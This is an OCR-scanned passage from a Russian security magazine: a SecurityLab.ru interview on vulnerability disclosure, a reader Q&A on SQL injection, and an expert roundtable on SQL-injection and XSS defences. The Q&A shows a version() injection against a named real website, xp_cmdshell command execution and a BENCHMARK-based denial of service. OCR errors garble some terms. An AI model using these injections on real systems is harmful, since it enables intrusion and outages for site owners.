Юнеско по вопросам права в России, исследова- 
ния по различным проблемам информационной 
безопасности с компанией Infowatch и другие. 


ЛЮБОЙ ПРОЕКТ, ПОСВЯЩЕННЫЙ 
БЕЗОПАСНОСТИ, ПО ИДЕЕ НАДО 
РАСЦЕНИВАТЬ КАК КЛАДЕЗЬ 
ИНФОРМАЦИИ ДЛЯ ЗАЩИТЫ. 

НО ЧАСТО ЭТУ ИНФОРМАЦИЮ 
ИСПОЛЬЗУЮТ ХАКЕРЫ. 
ПОЛУЧАЕТСЯ, ПРОЕКТ ПОРОЖДАЕТ 
НЕ БЕЗОПАСНОСТЬ, А ВЗЛОМ? 


АЛЕКСАНДР АНТИПОВ: Где получить нужную 
информацию, хакеры всегда найдут и без Security- 
Lab. Поэтому стоит задача более актуальная имен- 
но для специалистов по защите информации — 
не пропустить важные новости в мире обеспечения 
безопасности. С другой стороны, бывают и ленивые 
«хакеры», которым подай все на блюдечке, отком- 
пилируй нужный эксплойт, да и еще объясни, как с 
ним работать. А если серьезно, грань между безо- 
пасностью и взломом расплывчата: даже web-6pay- 
зер в умелых руках может превратиться в инстру- 
мент взлома, но это же не означает, что его нужно 
запрещать или ограничивать распространение. 


НАСКОЛЬКО НОВОСТНОЙ 

И АНАЛИТИЧЕСКИЙ КОНТЕНТ 
БЛИЗОК К РЕАЛЬНОСТИ? ОБЫЧНО 
НОВОСТИ И СТАТЬИ 
ВЫКЛАДЫВАЮТСЯ ПОСТФАКТУМ. 

И ЭТО ПАРАДОКСАЛЬНО — СВЕЖУЮ 
ИНФОРМАЦИЮ ОБЫЧНО 

КУДА БЫСТРЕЕ МОЖНО НАЙТИ 

НА САЙТАХ ХАК-ГРУПП. 


АЛЕКСАНДР АНТИПОВ: Конечно, самые инте- 
ресные и востребованные материалы мы стара- 
емся опубликовать сразу после их появления. 
В большинстве случаев небольшая задержка по- 
лучения информации не критична для читателя 
сайта. По поводу хак-групп ты перегнул, так как 
большинство исследователей тесно сотруднича- 
ют с разработчиками и никогда не опубликуют ин- 
формацию до выхода соответствующего испра- 
вления. Вообще в последнее время практически 
не осталось хакеров-энтузиастов. Уязвимости 
ищут либо сотрудники зесийу-фирм, для которых 
поиск — это часть работы, либо криминал, кото- 
рый пишет эксплойты для получения прибыли. 


КАКИМ ПРОЕКТАМ ДОВЕРЯЕШЬ 
САМ И ОТКУДА БЕРЕШЬ 
ОСНОВНУЮ МАССУ НОВОСТНОЙ 
ИНФОРМАЦИИ И АНАЛИТИКУ? 
КАК СТИМУЛИРУЕШЬ АВТОРОВ 
НА НАПИСАНИЕ СТАТЕЙ? 


АЛЕКСАНДР АНТИПОВ: Авторов можно стиму- 
лировать только деньгами. Чаще всего это выли- 
вается в конкурсы статей, и авторы лучших из них 
получают неплохие призы в денежном исчисле- 
нии. Ну, и перевод. Качество переводимых мате- 
риалов очень часто на порядок выше качества то- 
го, что могут написать собственные аналитики. 
Источников информации слишком много, сложно 
выделить какой-либо из них. В любом случае, 
каждый опубликованный материал перепроверя- 
ется на уникальность и достоверность по мере 
возможности. 


В ПРИНЦИПЕ, НИКТО НЕ МЕШАЕТ 
ХАКЕРУ СОВЕРШИТЬ АТАКУ ПОД 
ВИДОМ ОЧЕРЕДНОГО ОБНОВЛЕНИЯ, 
ПУСТИВ В СЕТЬ ИНФОРМАЦИЮ О 
ПСЕВДОУЯЗВИМОСТИ. А САЙТЫ 
ПО БЕЗОПАСНОСТИ ОПЕРАТИВНО 
РАСТАЩАТ ЭТУ «ДЕЗУ», ТАК КАК 
ВРЯД ЛИ ТЩАТЕЛЬНО 
ПРОВЕРЯЮТ ЕЕ СОДЕРЖАНИЕ. 
ТАКОЕ ВОЗМОЖНО? 


АЛЕКСАНДР АНТИПОВ: Да, такие случаи воз- 
никают довольно часто. Конечно, сайты по безо- 
пасности не изучают правдивость информации 
об уязвимости. Однако если такое произошло, 
все равно через некоторое время станет известно 


о подлоге. Опять же, тут оперативность только 
во вред, иногда стоит подождать пару дней и не 
публиковать неподтвержденную или подозритель- 
ную информацию. 


ДРУГАЯ ПРОБЛЕМА — В СЕТИ 

И НА ТВОЕМ ПРОЕКТЕ В ЧАСТНОСТИ 
ИНОГДА НЕВОЗМОЖНО НАЙТИ 
ИНФОРМАЦИЮ ОБ УЯЗВИМОСТЯХ 
СЛАБО РАСПРОСТРАНЕННЫХ 
ПРОГРАММ. 


АЛЕКСАНДР АНТИПОВ: Не так. Мы публикуем 
информацию обо всех уязвимостях, о которых 
было сообщено публично. Конечно, информация 
об уязвимостях в малораспространенных про- 
граммах появляется не так оперативно, как в ши- 
роко используемом ПО. Также на сайте содер- 
жится полная база данных обо всех уязвимостях 
на английском языке: http://en.securitylab.ru/nvd/. 
На сегодняшний день — 21260, обнаруженных 
с 1 октября 1988 года. 


ЗАЧЕМ ПОДРОБНО ОПИСЫВАТЬ 
УЯЗВИМОСТИ? КУДА ЛОГИЧНЕЕ 
МОЛЧА ДЕЛАТЬ РЕГУЛЯРНЫЕ 
ОБНОВЛЕНИЯ К ТОЙ ИЛИ ИНОЙ 
ПРОГРАММЕ. РЕАЛЬНЫЕ ХАКЕРЫ 
ВСЕ РАВНО В КУРСЕ ДЕЛА, 

А ИНФОРМАЦИОННЫЙ ВАКУУМ 

НЕ ДАСТ ШАНСОВ НА ВЗЛОМ ТЕМ, 
КТО САМ В ЭТОМ НИКОГДА 

НЕ РАЗБЕРЕТСЯ. 


АЛЕКСАНДР АНТИПОВ: В целом ты прав. Ко- 
нечному потребителю не нужны подробности уяз- 
вимости, ему важно знать, что она устранена. Ког- 
да сообщается, что закрыта критическая уязви- 
мость, то легче сразу установить соответствующее 
исправление, чем каждый раз после выхода новой 
версии обновлять ПО. Поэтому разработчики сами 
заинтересованы в разглашении факта наличия 
уязвимости только после ее закрытия (но они не за- 
интересованы в раскрытии способа эксплуатации). 
Подробная информация о дыре нужна, к примеру, 
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разработчикам сканеров безопасности (чтобы 
вставить соответствующие проверки), IDS-cuctem 
(для написания сигнатур атак) и производителям 
аналогичных программных продуктов, чтобы не до- 
пускать в своих программах подобных ошибок. 


РАССЧИТЫВАЛ ЛИ НА ТАКУЮ 
ПОПУЛЯРНОСТЬ ПРОЕКТА, 

КОГДА ВСЕ ТОЛЬКО НАЧИНАЛОСЬ? 
ТЫ УЖЕ РЕАЛИЗОВАЛ В РАМКАХ 
НЕГО ТО, ЧТО ХОТЕЛ, ИЛИ ЕСТЬ 
ЕЩЕ ЗАДУМКИ? КАКАЯ ГЛАВНАЯ 
ЦЕЛЬ НА СЕГОДНЯШНИЙ ДЕНЬ? 


АЛЕКСАНДР АНТИПОВ: Не могу сказать, что 
я на что-то рассчитывал. Начиналось все как хоб- 
би, потом, когда стали сотрудничать с компанией 
Positive Technologies, появилась возможность уде- 
лять больше времени созданию сайта и предоста- 
влению нужной информации. Сейчас не реализо- 
вано и четверти того, что я планирую. Но чтобы все 
это сделать, нужен еще не один год работы. © 


На вопросы отвечал 
Spider_Net 

(spider_net @inbox.ru), 
www.vr-online.ru 
Участник проекта 
vr-online.ru, ранее 
принимал участие 

в проекте mashp 
(mashp.h10.ru). 

В реальной жизни 
работает 
администратором БД 
и программистом. 

В профессиональном 
программировании 
более 4 лет, в основном 
пишет на Delphi и РНР. 


ОБЫЧНО ДЛЯ ТОЙ ИЛИ ИНОЙ АТАКИ 
НАДО ЗНАТЬ СЕРВЕР БАЗ ДАННЫХ 
И ЕГО ВЕРСИЮ. СУЩЕСТВУЮТ ЛИ 
ЭФФЕКТИВНЫЕ СПОСОБЫ ИХ 
ОПРЕДЕЛЕНИЯ? 


Существуют, хотя 100% работающего спо- 

соба нет. Для начала нужно попробовать 
внедрить какой-нибудь спецсимвол в любой зап- 
рос, допустим, это будет одинарная кавычка. Если 
сценарий не фильтрует переданные параметры, 
то ты должен увидеть сообщение об ошибке. 
Из текста ошибки можно узнать название сервера 
БД. Допустим, это MySQL. Чтобы определить вер- 
сию, можно попробовать внедрить функцию ver- 
sion() в запрос. Она возвращает номер версии 
MySQL. Некоторые грамотные программисты отк- 


лючают вывод любых ошибок, но, тем не менее, 
данные, которые сценарий получает от пользовате- 
ля, фильтруются плохо. В результате SQL Injection 
не отменяется, но приходится работать вслепую. 
Вот реальный пример. На официальном сай- 
те одной из моих любимых групп есть раздел 
с текстами их песен, все тексты хранятся в БД, 
и их выборка происходит с помощью сценария на 
РНР следующим образом. При загрузке этой 
ссылки — www.kipelov.ru/ly.php?idtxt=1 — получаем 
страничку с текстом песни под номером один. Ес- 
ли попробовать вставить какой-нибудь спецсим- 
вол в переменную idtxt, то загрузится просто чис- 
тая страница без каких-либо намеков на ошибку. 
В таком случае попробуем внедрить функцию ver- 
sion() в этот запрос: www.kipelov.ru/ly.php?idtxt=ver- 
sion(). Теперь мы видим не чистую страницу, а пе- 


сенку под номером четыре. Значит, функция ver- 
sion вернула «4», и, следовательно, мы имеем де- 
ло с четвертой версией «мускула». Чтобы точно 
определить название сервера БД, можно попы- 
таться внедрить в запрос те функции, которые 
присутствуют только в реализации SQL опреде- 
ленного сервера БД. Для этого необходимо знать 
тонкости большинства известных серверов или 
использовать специальные программки. 

Если ни одна попытка не увенчалась успе- 
хом, не расстраивайся! Узнай хостера, на сервере 
которого расположен этот сайт. Потом зайди на 
его официальную страницу. В большинстве случа- 
ев хостеры описывают конфигурацию своих сер- 
веров и ПО, установленное на них. Если на сайте 
ничего нет, то попробуй написать письмо. В пись- 
ме объясни, что ты хочешь воспользоваться услу- 


гами хостинга, а главный критерий — сервер БД. 
В итоге, ты получишь ответ на свой вопрос. Что 
касается сервера MySQL, то для определения ero 
версии существуют специальные программки. К 
примеру, релиз от команды UkrTeam. Ее исходный 
текст есть на диске к журналу. Можешь еще загля- 
нуть на www.packetstortsecuiry.nl. 


ВОЗМОЖНО ЛИ ВНЕДРИТЬ 
SQL INJECTION ЧЕРЕЗ ПЛЮШКИ 
(COOKIES)? 


Бывают такие случаи, когда веб-програм- 
(>) мисты извращаются и осуществляют лю- 
бую передачу данных посредством РО$Т-запро- 
сов. При использовании этого метода в адресной 
строке не будут отображаться имена переменных. 
Некоторые программисты считают, что так они мо- 
гут обезопасить свой проект от всех бед, и забива- 
ют на проверку передаваемых от пользователя 
данных. К тому же многие важные данные они сох- 
раняют в cookies. Можешь открыть плюшку, ска- 
жем, в CookieEditor и попытаться внедрить в один 
из параметров SQL Injection. Так что не стоит пре- 
небрегать проверкой данных из Cookies. 
($) Отличие в новых операторах, которые поя- 

вились в 4-ой версии. В том числе оператор 
UNION, благодаря которому можно объединять зап- 
росы и получать доступ ко всем таблицам БД поль- 
зователя, что существенно облегчает жизнь прог- 
раммистам. Взломщику же это дает дополнитель- 
ную возможность внедрения SQL Injection. Посмотри 
архив Bugtraq и увидишь, что большинство найден- 


ных ошибок типа SQL Injection основано на исполь- 
зовании этого оператора. 


© 


ЧЕМ ОТЛИЧАЕТСЯ ВНЕДРЕНИЕ SQL 
INJECTION В З-ЕЙ И 4-ОЙ ВЕРСИИ 
MYSQL? 


КАКОЙ СЕРВЕР БД НАДЕЖНЕЕ? 
ЛЕГЧЕ ЛИ ВНЕДРИТЬ SQL INJECTION 
ДЛЯ MS SQL SERVER? 

3-ИЙ ВОПРОС БУДЕТ ТАКОЙ: ИМЕЕТ 
ЛИ ОТНОШЕНИЕ SQL INJECTION 

К НАДЕЖНОСТИ СЕРВЕРА И КАКОЙ 
СЕРВЕР БАЗ ДАННЫХ НАДЕЖНЕЕ? 
ЛЕГЧЕ ЛИ ВНЕДРИТЬ SQL INJECTION 
КОНКРЕТНО ДЛЯ MS SQL SERVER? 


© SQL Injection He имеет отношения к надеж- 

ности сервера БД, так как основная проб- 
лема не в самом сервере, а в сценариях, через 
ошибки в которых внедряется SQL Injection. Но сто- 
ит заметить, что после успешного применения 
SQL Injection возможности сервера БД играют важ- 
ную роль, так как от этого зависит выгода, которую 
можно получить. Например, у MS SQL Server мож- 
но вызвать встроенную процедуру exec 
master..xp_cmdshell ‘dir /p', и, если администратор 
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упустил этот момент из виду, ты увидишь содержи- 
мое папки, в которой установлен MS SQL Server. С 
помощью этой процедуры можно много чего наде- 
лать. Все зависит от прав, с которыми работает М$ 
SQL Server. Если окажется, что это права «SYS- 
ТЕМ», то можно «порутить» весь сервер. 


© Да, причем сложного в этом ничего нет. 

В MySQL есть функция BenchMark, которая 
предназначена для вычисления определенного вы- 
ражения заданное количество раз. Синтаксис функ- 
ции следующий: Бепспат (1000000, md5(current_- 
time)). Вычисляется 100000 раз md5 хэш текущего 
времени. Это довольно ресурсоемкая операция, по- 
этому отнимает много процессорного времени. Те- 
перь представь, что будет, если увеличить количест- 
во вычислений, а еще лучше — сделать функцию 
benchmark вложенной. MySQL-cepBep начнет актив- 
но потреблять ресурсы системы, в результате чего 
начнутся жуткие тормоза, и, как следствие, сервер 
перестанет успевать обрабатывать запросы. Для ус- 
пешного проведения подобной атаки нужно напи- 
сать сценарий, который будет постоянно посылать 
подобные запросы. 


© Для начала стоит научиться программиро- 

вать на одном из языков, используемых для 
разработки \меб-приложений. Только так ты сможешь 
научиться находить ошибки в чужих проектах. Реко- 
мендуется начать с РНР. Сейчас этот язык очень по- 
пулярен и используется практически везде — начи- 
ная от домашних страничек и заканчивая серьезны- 
ми порталами. Если нет желания заморачиваться с 
РНР, то учи ASP. Тоже довольно популярный язык. 
Что касается конкретных книг, то в случае с РНР ре- 
комендую первым делом прочитать книгу Лари Уиль- 
яма. В ней описывается программирование на РНР 4 
с нуля. Книга написана простым языком. 

Затем необходимо разобраться с работой 
серверов БД. Зная все возможные операторы 
и функции, ты сможешь использовать их по назна- 
чению :). Почти все книги зарубежных авторов по- 
дойдут для начинающих — они написаны со 
свойственной европейской пунктуальностью (чего 
не всегда скажешь о наших) и почти всегда 
включают в себя базовые сведения. 

После этого рекомендую обратить внимание 
на книги Михаила Фленова: «РНР глазами хаке- 
ра» и «Web-cepBep глазами хакера» помогут pa- 
зобраться с использованием разных уязвимостей 
(в том числе и SQL Injection) на практике. В них 
приведено очень много примеров, поэтому читать 
интересно. © 


МОЖНО ЛИ С ПОМОЩЬЮ 
SQL INJECTION ЗАДОСИТЬ СЕРВЕР? 


КАК НАХОДИТЬ ВОЗМОЖНОСТИ 
ВНЕДРЕНИЯ SQL INJECTION? 
ЕСТЬ ЛИ КАКАЯ-НИБУДЬ 
ЛИТЕРАТУРА ПО ЭТОЙ ТЕМЕ? 
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АЛЕКСАНДР 
АНТИПОВ 


Руководитель проекта, 
автор/соавтор/редактор 
многочисленных статей 


ведущего отечественного 
портала, посвященного 
информационной 
безопасности 
SecurityLab.ru 


ВАЛЕРИЯ 
КОМИССАРОВА 


Имеет статус Microsoft 
Student Partner 

и сертификаты 
специалиста Microsoft 

и разработчика решений 
на C# nog .NET 


ПРОБЛЕМЫ С SQL INJECTION 
ПОЛУЧИЛИ ШИРОКУЮ ОГЛАСКУ 
БЛАГОДАРЯ УЯЗВИМОСТИ САЙТОВ, 
ТАК КАК МЕВ — МАССОВЫЙ 
ПРОДУКТ. НО ГДЕ ЕЩЕ МОЖНО 
ВСТРЕТИТЬ SQL INJECTION? 


МИХАИЛ 
ФЛЕНОВ 


Создатель сайта 
www.vr-online.ru, автор 
11 книг на русском 

и 4 на английском языке 


АНТОН 
КАРПОВ 


Специалист в области 
информационной 
безопасности. Круг 
профессиональных 
интересов: сетевые атаки, 
безопасность UNIX- 
систем, безопасность 
беспроводных сетей 


КРИС 
КАСПЕРСКИ 


Компьютеры грызет еще 
с тех давних времен, 
когда Правец-8Д 
считался крутой машиной, 
а дисковод с монитором 
были верхом мечтаний. 
Освоил кучу языков 

и операционных систем, 


из которых реально 
использует W2K, a любит 
FreeBSD 4.5 


ВАЛЕРИЯ КОМИССАРОВА: Главное в SQL Injection не то, что эта уязви- 
мость активно эксплуатируется в меБ-приложениях, а то, что она может быть 
использована абсолютно во всех приложениях, написанных на любых языках 
программирования, в которых использованы SQL-3anpocb! (ведь практиче- 
ски в каждый из них можно внедрить опасные ЗОЕ-инъекции). 

АНТОН КАРПОВ: Очевидно, везде, где требуется ввод данных от пользова- 
теля, а базы данных используются в качестве backend'a для хранения инфор- 
мации. Это может быть не только онлайн-магазин или веб-форум (хотя по- 
нятно, что WWW является наиболее широкой областью применения SQL Injec- 
tion). Это может быть любое приложение, которое хранит информацию в базе 
данных и предоставляет интерфейс для доступа к ней. 

КРИС КАСПЕРСКИ: Наверное, везде, где стоит SQL, обрабатывающий 
не отфильтрованные пользовательские запросы. Многие программы, рабо- 
тающие с базами данных, используют SQL. Клиентское приложение взаимо- 
действует с пользователем и генерирует $49!-запросы, посылая их серверу. В 
правильно спроектированной системе разграничение доступа к данным осу- 
ществляется на сервере. Клиента это вообще не касается, — он вправе слать 
любые запросы. Но далеко не все разработчики это понимают (или реализуют 
должным образом). В результате часть (или все) проверки на наличие у поль- 
зователя прав выполнять данную $9!-операцию осуществляются на клиент- 
ской стороне, внутри программы. Обычный пользователь, действительно, не 
может обойти защиту, так как наталкивается на интерфейс, но хакер легко на- 
правит запрос к sql-cepBepy по Сети и тот послушно выполнит его со всеми 
вытекающими отсюда последствиями (а иногда никакой Сети вообще нет, 
«sql-cepBep» представляет собой локальную программу). Тем не менее, web- 
интерфейс является одним из самых популярных способов взаимодействия с 
базами данных (особенно удаленными), и актуальность атак типа SQL Injec- 
tion в обозримом будущем снижаться не будет. 


КАКИЕ СПОСОБЫ БОРЬБЫ С SQL 
INJECTION НАИБОЛЕЕ ЭФФЕКТИВНЫ? 


XSS — РЕАЛЬНАЯ УГРОЗА ИЛИ СЛАБОЕ 
МЕСТО ПОФИГИСТОВ? 


ВАЛЕРИЯ КОМИССАРОВА: Существует несколько методов борьбы 
с 5ОЕ-инъекциями: использование различных функций (как встроенных си- 
стемных/языка программирования, так и созданных программистом) для 
экранирования различных «недоброкачественных» символов в запросе; ис- 
пользование метода перебора, который позволяет кроме символов удалять и 
разные управляющие слова и последовательности; использование специаль- 
ных функциональных «оберток», берущих на себя всю «грязную» работу; ис- 
пользование типизированных параметров. 

ЗАРАЗА: Основные методы борьбы примерно следующие: избегать исполь- 
зования $4!-запросов, использовать вместо них хранимые процедуры и пред- 
ставления; контролировать любой запрос пользователя на уровне процедур 
получения данных (например, процедура получения переменной из дие- 
ry_string); создавать роли в базе данных, наделенные минимальным набором 
полномочий, чтобы даже имея полный доступ к базе данных, пользователь 
не мог произвести «вредных» действий; можно назвать еще и средства 
фильтрации запросов, файрволы на уровне приложений (баз данных), но все 
ЭТО — «неправильные» средства. 

МИХАИЛ ФЛЕНОВ: Проверка всех параметров, четкое разделение прав до- 
ступа и, желательно, несколько уровней защиты (например, модули безопас- 
ности). Должно быть разрешено только то, что необходимо, а все остальное 
нужно запрещать. Например, если пользователь не должен видеть опреде- 
ленные таблицы в базе данных, то учетная запись, под которой выполняются 
запросы данного пользователя, не должна иметь прав на эти таблицы. Одну 
единственную защиту обойти достаточно просто, а если используется сразу 
несколько методов, то сработает другой уровень безопасности. 

КРИС КАСПЕРСКИ: Разграничение доступа к данным на уровне ЗО! -серве- 
ра. Но проблема здесь в том, что с точки зрения SQL-cepBepa, обрабатываю- 
щего запросы web-cepBepa, под которым «вращается» сайт, написанный на 
РНР или Ре!'е, все запросы равнозначны, поскольку авторизация пользова- 
телей (даже если она и предусмотрена), как правило, осуществляется на 
РНР. Просто в SQL-6a3e хранятся пользователи с паролями, проверяемыми 
РНР-скриптом, а для SQL есть только один пользователь — сам РНР-скрипт. 
Причем РНР — не самый безопасный язык программирования (как, впрочем, 
и Perl). Он допускает интерполяцию строк и вообще любит разводить само- 
деятельность. На Си написать безопасный сайт намного проще, но тут уже 
возникают проблемы иного рода: переносимость, переполнение буферов 
(фундаментальная проблема Си) и т.п. Так что остается нанимать грамотных 
программистов, имеющих реальный опыт, и давать им реальные сроки для 
выполнения заказа, поскольку подавляющее большинство ошибок соверша- 
ется из-за невнимательности, излишней суетливости и нервозности, вызван- 
ной нависающим дедлайном. 

АЛЕКСАНДР АНТИПОВ: Защита! Как на уровне кода, так и на уровне серве- 
ра. К сожалению, способов эксплуатации ЗО! -инъекции — огромное множе- 
ство и ошибаются даже опытные программисты. Поэтому всегда необходимо 
использовать дополнительные средства защиты на сервере — минимизация 
привилегий, web-IDS-cuctempb! (типа mod_security или securellS). 


ВАЛЕРИЯ КОМИССАРОВА: На мой взгляд, проблема XSS достаточно 
серьезна и распространена, чтобы не принимать ее во внимание. И масштабы 
этой «эпидемии» заставляют говорить об Х$$ как о значительной угрозе, а не 
как об очередной РВ-придумке. 

ЗАРАЗА: Одна из моих первых статей, посвященных проблемам безопасно- 
сти, называлась «Еще раз о взломах НТМЁ-чатов» (www.security.nnov.ru/artic- 
les/3APA3Ahtml.asp). Была написана, если не ошибаюсь, в 1998 году и содержа- 
ла реальные примеры межсайтового скриптинга. Термина такого в то время 
еще не существовало, и вообще, эта проблема достаточно долго не счита- 
лась проблемой безопасности. Я помню продолжительный диалог с Aleph 
One (основатель и первый модератор Bugtraq) на эту тему, но убедить его в 
реальности угрозы мне тогда так и не удалось. Только в 2001 году ошибки 
CSS/XSS начали восприниматься как проблемы безопасности, и появился 
сам термин «Cross-Site Scripting». 
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ЗАРАЗА 

Руководитель службы 
поддержки 
пользователей довольно 
крупного ISP. Хобби — 
разработка программного 
обеспечения, в частности, 
проект Зргоху (www.secu- 
rity.nnov.ru/soft/3proxy/) 
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КАКИЕ СПОСОБЫ БОРЬБЫ С XSS 
НАИБОЛЕЕ ЭФФЕКТИВНЫ? 


МОЖНО ЛИ ЗАЩИТИТЬ 
ДИНАМИЧЕСКИЙ САЙТ OT SQL 
INJECTION И Х$$ (ЕСТЬ СКРИПТЫ, 
РАБОТАЮЩИЕ НА БД) НА 100% 


МИХАИЛ ФЛЕНОВ: Сверхугрозой я бы эту атаку не назвал. Да и SQL Injection тоже нельзя отнести 
к сверхугрозе. Все это невнимательность или ламерство программистов. Если первое, то это не страш- 
но, потому что программист, допустивший ошибку, быстро исправит ее сам. А вот ламер, который не хо- 
чет учиться, пострадает намного сильнее. Глядя на количество дырявых сайтов в интернете, понима- 
ешь, что количество программистов сокращается, а ламеров — растет. 

АНТОН КАРПОВ: Любая проблема безопасности возникает под воздействием человеческого фактора. 
Безопасность системы во многом определяется ее качеством. Если говорить о программных средствах, 
то это качество кода. Программист недосмотрел, недодумал, совершил пару известных ошибок — это 
может быть как пофигизм, так и низкая квалификация. Учитывая растущую популярность XSS-atTak, 
я бы не назвал это слабым местом пофигистов, во всяком случае, тогда бы нам пришлось признать, что 
пофигистов в мире очень и очень много :). 

КРИС КАСПЕРСКИ: XSS/Cross-Site Scripting появился, когда Netscape добавила в браузер поддержку 
JavaScript. А это не вчера и не позавчера, а много лет назад было. И сейчас без скриптовых языков ни- 
куда. Стоит только отключить их поддержку, как значительная часть сайтов отображается неверно или 
вообще перестает работать. А модель (не)безопасности виртуальных машин давно стала притчей 
во языцех, и еще ни одному производителю не удалось избежать ошибок реализации. В лучшем слу- 
чае, злоумышленник получает доступ к cookies'am (хранящим массу конфиденциальной информации). 
В худшем же — полностью захватывает управление удаленной машиной. Это вполне серьезная угроза, 
с которой необходимо считаться. 


ВАЛЕРИЯ КОМИССАРОВА: Из-за большой родственности атак SQL Injection и XSS общие концепции 
методов борьбы с ними также очень похожи. Все та же фильтрация (встроенными средствами или создан- 
ными своими силами), использование «строгих» имен и так далее. И в дополнение... включай мозги :). 
ЗАРАЗА: К сожалению, единственный действенный способ борьбы — полностью отказаться от того, 
чтобы дать пользователю возможность использовать прямо или косвенно какие-либо тэги. Например, 
можно фильтровать любые НТМЕ-тэги на уровне функций разбора запроса и служебных заголовков. 
Но даже такой способ не дает 100% гарантии защиты. 

МИХАИЛ ФЛЕНОВ: Нужно внимательно писать код и тестировать все по нескольку раз. Лет пять на- 
зад даже в нашей стране разные фирмы достаточно часто обращались к спецам по безопасности для 
тестирования своих систем. Мне самому приходилось иногда тестировать. А за последние два года у 
меня был только один подобный заказ. Однажды я нашел дыру на сайте и показал ее владельцу, по- 
сле этого он попросил протестировать еще один его сайт. Сейчас чаще обращаются с просьбой взло- 
мать, но я взломами не занимаюсь. Я не думаю, что только ко мне стали меньше обращаться. Пять 
лет назад хакеры даже пытались открывать фирмы по тестированию безопасности. И в начале биз- 
нес вроде пошел, но потом умер. Или хакеры выполняли свои обязанности плохо, или заказчики не 
увидели преимуществ. 

Тестировать нужно и сайты, и программы. И лучше, если это будут независимые люди. Сколько ха- 
керов смогло бы направить свои усилия в мирное русло! Около года назад мне предлагали тестировать 
безопасность в Agnitum и, хотя я отказался, общение с ребятами показало, что не зря Outpost Firewall — 
один из лучших, потому что подход правильный. Я с удовольствием доверю безопасность своего ком- 
пьютера сетевому экрану, который тестируется, быстро развивается и отслеживает тенденции в мире 
безопасности. Если бы все программисты так работали, то количество взломов сократилось бы в разы. 
КРИС КАСПЕРСКИ: Отключить поддержку Java и Ко в браузере, а если это невозможно, использо- 
вать наиболее аккуратно написанные бразуеры (например, Оперу). IE дыряв, как ведро без дна. В Го- 
рящем Лисе в последнее время наблюдается непрекращающийся рост уязвимостей, превративших 
его в дуршлаг. Так что никто не может чувствовать себя в безопасности, разве что пользователи Рыся 
(бразузер Lynx, не путать с Linux). 


ВАЛЕРИЯ КОМИССАРОВА: Очевидно, что защититься на 100% ни от чего нельзя. И не стоит искать 
победителей в бою хакеров с программистами. Но использование различных методов борьбы с этими 
напастями (методов, между прочим, уже давно выявленных и формализованных) позволит обезопа- 
сить сайт если не на 100, то на 90%. И это уже неплохо, ведь профессиональных взломщиков среди со- 
временного хак-контингента совсем не много. 

МИХАИЛ ФЛЕНОВ: Защититься можно, но для этого нужно постоянно думать о безопасности — 
во время проектирования, реализации и внедрения, а не когда взломали. 

КРИС КАСПЕРСКИ: 100% гарантию не дает даже Госстрах. Хотя идея застраховать сайт в страховой 
компании не такая уж и бредовая, какой кажется на первый взгляд. По крайней мере, в случае атаки 
компания компенсирует нанесенный ущерб. А если серьезно, то все решает сложность. Несколько со- 
тен строк можно проверить и вдоль, и поперек. Но трудоемкость проверки кода растет быстрее его 
объема и, начиная с некоторого уровня, становится практически невыполнимой задачей, требующей 
гигантских ресурсов. Следовательно, лучшая защита — это простота исполнения. © 
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Секреты демо-кодинга 
НЕМНОГО ИНТЕРЕСНОГО 
0 ПРОГРАММИРОВАНИИ ДЕМО 


Интервью 
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ДЕМОМЕЙКИНГ, ИСТОРИЯ 


Графика в демках 
ИСТОРИЯ И СОВРЕМЕННОСТЬ 
ОТКРУТОГО СЦЕНЕРА 


стр. 88 


Мне всегда нравилось, когда ИНДУСТРИЯ переходит в ИСКУССТВО. 

Строить дома, бани, гаражи и подвалы — это практично. Писать базы данных 

и тест-системы — тоже нужное и практичное дело, за которое, бывает, платят 
немалые деньги. Правда, в этом разделе мы не будем говорить 

о программировании на большого дядю. Вместо бань у нас тут будут римские 
термы, уставленные прекрасными статуями, вместо панельных домов — 
Коллизеи, Колоссы Родосские и гробницы Мавсола. Иначе говоря, мы 
расскажем тебе о демо-мейкинге. А уж после того, как я погонял несколько 
интересных демок на своем компе (особенно ту, размером 64 Кб, где трехмерная 
неодетая дама совершает прогулку в астральном мире), я понял, что иногда это 
не только искусство, но и немного волшебство :) 


секреты 
Аето-кодинга 


ЕМКА — ЭТО ПРОГРАММА, КОТОРАЯ В РЕАЛЬНОМ 
ВРЕМЕНИ ОСУЩЕСТВЛЯЕТ ПРОРИСОВКУ СЛОЖНЫХ 
ГРАФИЧЕСКИХ ФИГУР В УСЛОВИЯХ СТРОГОИ 
СИНХРОНИЗАЦИИ С МУЗЫКОЙ, ИСПО УЯ 
ВЫЧИСЛИТЕЛЬНЫЕ И МУЛЬТИМЕДИИНЫЕ 
ВОЗМОЖНОСТИ КОМПЬЮТЕРА. ЗВУЧИТ СЛИШКОМ 
НАПЫЩЕННО? ТОГДА, ПОЖАЛУИ, ОСТАНОВИМСЯ 
НА ТОМ, ЧТО ДЕМКА — ЭТО ПРОСТО ПРОГРАММА 
Дмитрий Грамотеев 


+> demo internal mechanics. Сначала демы де- 
монстрировали крутость программирования и дела- 
лись, чаще всего, одним или двумя участниками. 
В наше время демки указывают на креативность ав- 
тора и нестандартность его мышления. Сложность 
и количество медиаконтента в современных демках 
диктует необходимость разделять авторов на прог- 
раммера, музыканта, художника и моделлера. 
Современные демки достигают размеров 
20 мегабайт. Спрашивается, а не проще ли перег- 
нать с помощью kkapture все это счастье в такого 
же размера AVI и смотреть на любом компьютере 
ивлюбом разрешении? Ан нет! Ни один из сущест- 
вующих видеокодеков не способен при сопостави- 
мом размере результирующего файла передать 
попиксельное качество картинки демки. Более то- 
го, если позволяют вычислительные мощности, 
то изображение на экране будет меняться не со 
скоростью классических А\!шных 25 кадров в се- 
кунду, а со скоростью 100 и даже 200! Да, сам факт 
осознания того, что все это делается в реальном 
времени, добавляет демкам стоимости. 
> — на чем пишутся демки? Первый вопрос при 
написании демо, который встает перед большин- 
ством людей, решивших, что им пора написать 
собственное произведение, — «а на чем это пишет- 
ся?». Демы пишутся на том языке программирова- 
ния, который более удобен автору. Чаще всего — 
на C/C++ (VC, GNU С). Конечно, не стоит думать, 
что выбор, доступный программисту, это «С++ 
or die». Единственный реальный бонус, который по- 
лучают люди, которые пишут на приплюснутом Си 
перед другими языками программирования, это то, 
что примеры из MSDN, Direct-X SDK и море тутори- 


алов написаны именно на этом языке. Все осталь- 
ное — just rumors. Других объективных причин пре- 
имущества C/C++ особо и нет. Ha Delphi, VB или да- 
же на «голом» ассемблере можно написать абсо- 
лютно то же самое, а то и что-нибудь покруче 
(собственно, люди так и поступакт :-)). 

Еще демки пишутся в демосистемах. Демосис- 
